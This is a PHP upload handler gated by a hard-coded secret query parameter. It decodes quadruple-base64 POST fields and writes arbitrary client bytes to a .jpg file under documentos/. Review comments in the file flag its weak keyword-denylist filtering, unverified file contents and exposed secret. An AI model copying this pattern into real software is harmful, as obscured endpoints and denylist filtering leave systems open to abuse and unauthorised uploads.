<?php 
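	//ini_set('memory_limit', '100K');
	// Keep error details out of the HTTP response, but still record them in the
	// server log. error_reporting(0) silences the log as well, so rejected
	// requests and failed writes in this upload endpoint would leave no trace
	// for troubleshooting or incident review.
	error_reporting(E_ALL);
	ini_set('display_errors', '0');
	ini_set('log_errors', '1');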
	/**
	 * Undo four nested layers of base64 encoding.
	 *
	 * Base64 is an encoding, not encryption: stacking it four times gives the
	 * value no confidentiality or integrity, so the result must be treated as
	 * untrusted input like any other request field.
	 *
	 * Decoding is non-strict, so characters outside the base64 alphabet are
	 * skipped by base64_decode() instead of causing a failure.
	 *
	 * @param string $txt  Text that was base64-encoded four times.
	 * @return string      The decoded value.
	 */
	function b64_de($txt){
		$capas = 4;
		while ($capas-- > 0) {
			$txt = base64_decode($txt);
		}
		return $txt;
	}
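	/**
	 * Abort the request (die) when $str contains a denylisted SQL/PHP keyword.
	 *
	 * The comparison is case-insensitive and requires a word boundary only at
	 * the END of the keyword, so any ordinary word that merely ends in one of
	 * the keywords also aborts the request.
	 *
	 * A keyword denylist is not a defence against SQL injection. No query is
	 * built in this file; wherever one is, bind the values through prepared
	 * statements instead of relying on this check.
	 *
	 * @param mixed $str  Value to inspect. Arrays are rejected outright.
	 * @return void       Returns normally only when nothing matched.
	 */
	function filtro_str_mysql($str){
		// Array-valued request fields are not text. PHP 8 raises a TypeError in
		// strtoupper() for them, while older versions return null and the check
		// below would then pass without inspecting anything. Fail closed.
		if (is_array($str)) die();
		$palabras = array(
			"SELECT","FROM","WHERE","ORDER",
			"INSERT","INTO","VALUES","UPDATE",
			"SET","PASSWORD","FLUSH","DELETE",
			"ALTER","TABLE","LOAD","CREATE",
			"SHOW","USE","DATABASE","TRIGGER",
			"EVENT","LOCK","ROUTINE","VIEW",
			"DROP","EXECUTE","REFERENCES",
			"PHP"
		);
		// Upper-case the subject once instead of once per keyword.
		$texto = strtoupper($str);
		// Iterate by value; the original by-reference loop left a dangling reference.
		foreach ($palabras as $palabra) {
			if (preg_match('/' . $palabra . '\b/', $texto)) die();
		}
	}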
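	/**
	 * Reject empty input, run the keyword filter, then strip markup, the
	 * characters # ' " and every ".php" from a text value.
	 *
	 * This is a denylist clean-up, not context-aware escaping. The result is
	 * not safe to place into SQL, HTML attributes or file system paths without
	 * further handling; directory separators and ".." pass through untouched,
	 * so callers that build a path from it must validate the name themselves.
	 *
	 * @param mixed $str  Value to clean; an empty string or null ends the script.
	 * @return string     The cleaned text.
	 */
	function filtro_str($str){
		if ($str == "" || $str == null) die();
		filtro_str_mysql($str);
		$str = strip_tags($str);
		$str = str_replace(array("#", "'", "\""), "", $str);
		// The original patterns /.php/ and /.PHP/ left the dot unescaped, so ANY
		// character followed by "php" was deleted (which also damages base64
		// text passed through here), and mixed-case spellings were missed.
		// Match the literal ".php" case-insensitively, and repeat until nothing
		// changes so a removal cannot leave a new ".php" behind.
		do {
			$previo = $str;
			$str = str_ireplace(".php", "", $str);
		} while ($str !== $previo);
		return $str;
	}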
	/**
	 * Gate for file contents: end the script on empty input or on a keyword
	 * hit in filtro_str_mysql(), otherwise hand the value back unchanged.
	 *
	 * NOTE(review): the keyword filter is a text check. Run against binary
	 * data it aborts whenever the bytes happen to spell a listed keyword
	 * followed by a non-word byte, and it does not establish what kind of
	 * file the data is. Confirm this is the intended check for uploads.
	 *
	 * @param mixed $str  File contents to check.
	 * @return mixed      The same value, unmodified.
	 */
	function filtro_str_file($str){
		$vacio = ($str == "") || ($str == NULL);
		if ($vacio) {
			die();
		}
		filtro_str_mysql($str);
		return $str;
	}
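	/**
	 * Handle the "login" upload request: check the POST fields and write the
	 * decoded image to documentos/<d2>.jpg. Never returns; every path ends in
	 * die().
	 *
	 * POST fields read here:
	 *   status - must equal "login"
	 *   d1     - text, base64-encoded four times; only validated
	 *   d2     - text, base64-encoded four times; used as the file name
	 *   d3     - image bytes, base64-encoded once
	 *   d4     - text; only validated
	 */
	function archivo(){
		unset($_GET);
		// Run the keyword filter over every POST value. Iterating by value
		// avoids leaving a reference into $_POST behind after the loop.
		foreach ($_POST as $valor) {
			filtro_str_mysql($valor);
		}
		if (!isset($_POST["status"]) || $_POST["status"] !== "login") die();
		// Every field used below must be present and be a plain string.
		foreach (array("d1", "d2", "d3", "d4") as $campo) {
			if (!isset($_POST[$campo]) || !is_string($_POST[$campo])) die();
		}
		// d1, d4 and status are not used afterwards; the calls are kept because
		// filtro_str() ends the script when a value is empty or hits the filter.
		filtro_str(b64_de($_POST["d1"]));
		$var2 = filtro_str(b64_de($_POST["d2"])); // file name, without extension
		// NOTE(review): d3 passes through text filters before and after decoding.
		// They may reject or modify legitimate binary data, and nothing here
		// verifies that the decoded bytes are a JPEG. Confirm uploads survive intact.
		$var3 = filtro_str_file(base64_decode(filtro_str($_POST["d3"]))); // binary image
		filtro_str($_POST["d4"]);
		filtro_str($_POST["status"]);
		unset($_POST);
		// d2 is client-supplied and becomes part of a file system path, and
		// filtro_str() does not remove directory separators. Refuse any name
		// containing a separator or NUL byte so the write stays in documentos/.
		if (preg_match('#[/\\\\\x00]#', $var2)) die();
		// "wb" truncates: an existing file with the same name is overwritten.
		$myfile = fopen("documentos/".$var2.".jpg", "wb") or die();
		fwrite($myfile, $var3);
		fclose($myfile);
		die();
	}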
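	// Entry point: the upload handler runs only when the request carries the
	// shared secret in its query string; anything else ends with no output.
	//
	// NOTE(review): a secret sent in the query string is typically recorded in
	// web server and proxy access logs, and here it is also hard-coded in the
	// source. Consider moving it to a request header or the POST body and
	// loading the expected value from configuration kept outside the web root.
	$claveParam = 'djfkndfnnfajnfaenflienfaleuh9348rj9o348w';
	$claveEsperada = "jkfnawiejfa984ja98ifa98ij9w8aj39a8jeew8ja9ejapej983jr9i3fsieu3";
	$claveRecibida = isset($_GET[$claveParam]) ? $_GET[$claveParam] : null;
	// Require a string (the parameter may be missing or array-valued) and
	// compare in constant time instead of with the loose == operator.
	if (!is_string($claveRecibida) || !hash_equals($claveEsperada, $claveRecibida)) {
		die();
	}
	archivo();
	die();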
?>